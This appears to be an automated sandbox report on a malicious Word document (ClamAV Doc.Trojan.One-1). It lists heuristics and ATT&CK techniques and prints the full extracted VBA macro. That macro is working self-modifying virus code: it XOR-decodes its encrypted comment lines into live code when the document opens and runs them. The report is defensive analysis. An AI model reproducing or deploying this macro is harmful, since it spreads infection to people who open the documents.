MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The VBA code appears to be obfuscated and attempts to modify itself, likely to download and execute a second-stage payload. The ClamAV detection of 'Doc.Trojan.One-1' further confirms its malicious nature.
Heuristics 3
-
ClamAV: Doc.Trojan.One-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.One-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5240 bytes |
SHA-256: 884b54d68bcdd7f59bd77c0fe812baf8ce71dd987381f18fd00fb25b9637606b |
|||
|
Detection
ClamAV:
Doc.Trojan.One-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() j = j + VBA.CInt(1) y = VBA.CInt(27) Do Word.Application.MacroContainer.VBProject. _ vbcomponents(VBA.CInt(j)).codemodule.ReplaceLine y, _ c(VBA.Mid(Word.Application.MacroContainer.VBProject. _ vbcomponents(VBA.CInt(j)).codemodule.lines(VBA.CInt(y), _ VBA.CInt(j)), (VBA.CInt(j) + VBA.CInt(j))), VBA.Val(VBA. _ Mid(Word.Application.MacroContainer.VBProject.vbcomponents _ (VBA.CInt(j)).codemodule.lines(VBA.CInt((25)), VBA.CInt(j)), _ (VBA.CInt(j) + VBA.CInt(j))))) VBA.DoEvents y = y + j Loop While y <> VBA.CInt(87) One End Sub Private Function c(a, b) Do y = y + VBA.CInt(1) c = c & VBA.Chr(VBA.CInt(VBA.Asc(VBA.Mid(a, VBA.CInt(y), _ VBA.CInt(1))) Xor VBA.CInt(b))) Loop While y <> VBA.CInt(Len(a)) End Function '241 Private Sub One() '¾ŸÑ´ƒƒžƒÑ£”‚„œ”Ñ¿”‰… 'ˆÑÌшÑÚѧ³°ß²¸Ÿ…ÙÀØ '‚²„ƒ§”ƒÑÌѧ³°ß²¸Ÿ…ÙÀØ '¦žƒ•ß°���˜’�…˜žŸß¾�…˜žŸ‚ߧ˜ƒ„‚¡ƒž…”’…˜žŸÑÌÑ› '¦žƒ•ß°���˜’�…˜žŸß¾�…˜žŸ‚ߢ�‡”¿žƒœ��¡ƒžœ�…ÑÌÑ› '¦žƒ•ß°���˜’�…˜žŸß¢…�…„‚³�ƒÑÌÑ·��‚” '¸—Ñ¿ž…Ñ¥˜œ”ѽ˜š”ÑÓÛÃÛÂÛÓÑ¥™”ŸÑ¶ž¥žÑ�™„€˜… '¢”…Ñž“›¿´¥ÑÌѲƒ”�…”¾“›”’…ÙÓ¸Ÿ…”ƒŸ”…´‰��žƒ”ƒß°���˜’�…˜žŸÓØ '¸—Ñž“›¿´¥ÑÌÑÓÓÑ¥™”ŸÑ¶ž¥žÑ�™„€˜… 'µžÑ¦™˜�”Ñž“›¿´¥ß³„‚ˆ '§³°ßµž´‡”Ÿ…‚ '½žž� 'ž“›¿´¥ß§˜‚˜“�”ÑÌÑÁ 'ž“›¿´¥ß¿�‡˜–�…”ÑÓ™……�ËÞÞ†††ß‚…�‚ߟ”…ÞÃÞžŸ”ÞžŸ”ß…‰…Ó 'µžÑ¦™˜�”Ñž“›¿´¥ß£”�•ˆ¢…�…”ÑÍÏÑÅ '§³°ßµž´‡”Ÿ…‚ '½žž� '‚’ž•”ÑÌÑž“›¿´¥ßµž’„œ”Ÿ…ß³ž•ˆß˜ŸŸ”ƒ¥”‰… 'ž“›¿´¥ß „˜… '‚¾Ÿ”¸µÑÌѼ˜•Ù‚’ž•”ÝшÝÑˆØ '¸—Ñ‚¾Ÿ”¸µÑÍÏѲ™ƒÙÀÇÄØÑ¥™”ŸÑ¶ž¥žÑ�™„€˜… '‚¿”†§”ƒÑÌѧ��Ù¼˜•Ù‚’ž•”ÝÑÅÝшØØ '¸—Ñ‚¿”†§”ƒÑÏÑ‚²„ƒ§”ƒÑ¥™”Ÿ '‚’ž•”ÑÌѼ˜•Ù‚’ž•”ÝÑÆØ '¥™˜‚µž’„œ”Ÿ…ߧ³¡ƒž›”’…߇“’žœ�žŸ”Ÿ…‚ÙˆØßÑ® '’ž•”œž•„�”ß•”�”…”�˜Ÿ”‚шÝÑÉÈ '¥™˜‚µž’„œ”Ÿ…ߧ³¡ƒž›”’…߇“’žœ�žŸ”Ÿ…‚ÙˆØßÑ® '’ž•”œž•„�”ߘŸ‚”ƒ…�˜Ÿ”‚шÝÑ‚’ž•” '¶ž¥žÑŸž‚�ƒ”�•Ë '´Ÿ•Ñ¸— '�™„€˜…Ë '‹ÑÌѧ³°ß²¸Ÿ…ÙÃÆØ 'šÑÌÑÃÀÁÑÚѸŸ…Ù£Ÿ•ÑÛÑÅÄØ '¥™˜‚µž’„œ”Ÿ…ߧ³¡ƒž›”’…߇“’žœ�žŸ”Ÿ…‚ÙˆØßÑ® '’ž•”œž•„�”ߣ”���’”½˜Ÿ”ÑÃÄÝѲ™ƒÙÂÈØÑ×Ñš 'µž '¥™˜‚µž’„œ”Ÿ…ߧ³¡ƒž›”’…߇“’žœ�žŸ”Ÿ…‚ÙˆØßÑ® '’ž•”œž•„�”ߣ”���’”½˜Ÿ”Ñ‹ÝѲ™ƒÙÂÈØÑ×Ñ’Ù¥™˜‚µž’„œ”Ÿ…ßÑ® '§³¡ƒž›”’…߇“’žœ�žŸ”Ÿ…‚ÙˆØß’ž•”œž•„�”ß�˜Ÿ”‚Ù‹ÝшØÝÑšØ '§³°ßµž´‡”Ÿ…‚ '‹ÑÌÑ‹ÑÚш '½žž�Ѧ™˜�”Ñ‹ÑÍÏѧ³°ß²¸Ÿ…ÙÉÆØ '‚’ž•”ÑÌÑ¥™˜‚µž’„œ”Ÿ…ߧ³¡ƒž›”’…߇“’žœ�žŸ”Ÿ…‚ÙˆØßÑ® '’ž•”œž•„�”ß�˜Ÿ”‚ÙˆÝÑÉÈØ '¸—Ñ¥™˜‚µž’„œ”Ÿ…ÑÌÑ°’…˜‡”µž’„œ”Ÿ…Ñ¥™”ŸÑ® '¢”…Ñž“›¾Ÿ”ÑÌÑ¿žƒœ��¥”œ���…”Ñ´�‚”Ñ® '¢”…Ñž“›¾Ÿ”ÑÌÑ°’…˜‡”µž’„œ”Ÿ… '¦˜…™Ñž“›¾Ÿ”ߧ³¡ƒž›”’…߇“’žœ�žŸ”Ÿ…‚ÙˆØ '¦˜…™Ñß’ž•”œž•„�” '¸—ѧ³°ß¼˜•Ùß�˜Ÿ”‚ÙÉÉÝшØÝÑÃØÑÍÏÑÓ¾Ÿ”ÓÑ¥™”Ÿ 'ß•”�”…”�˜Ÿ”‚шÝÑß’ž„Ÿ…ž—�˜Ÿ”‚ 'ߘŸ‚”ƒ…�˜Ÿ”‚шÝÑ‚’ž•” '¸—Ñ¥™˜‚µž’„œ”Ÿ…ÑÌÑ¿žƒœ��¥”œ���…”Ñ¥™”ŸÑ® '°’…˜‡”µž’„œ”Ÿ…ߢ�‡”°‚Ñ°’…˜‡”µž’„œ”Ÿ…ß·„��¿�œ” '´Ÿ•Ñ¸— '´Ÿ•Ñ¦˜…™ '´Ÿ•Ñ¦˜…™ 'Ÿž‚�ƒ”�•Ë '¥™˜‚µž’„œ”Ÿ…ߢ�‡”°‚Ñ¥™˜‚µž’„œ”Ÿ…ß·„��¿�œ”Ýц•·žƒœ�…µž’„œ”Ÿ… 'Ö½˜Ÿ”‹”ƒÁÞÞ†žƒ�•†˜•” End Sub 'One '(c) jackie |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.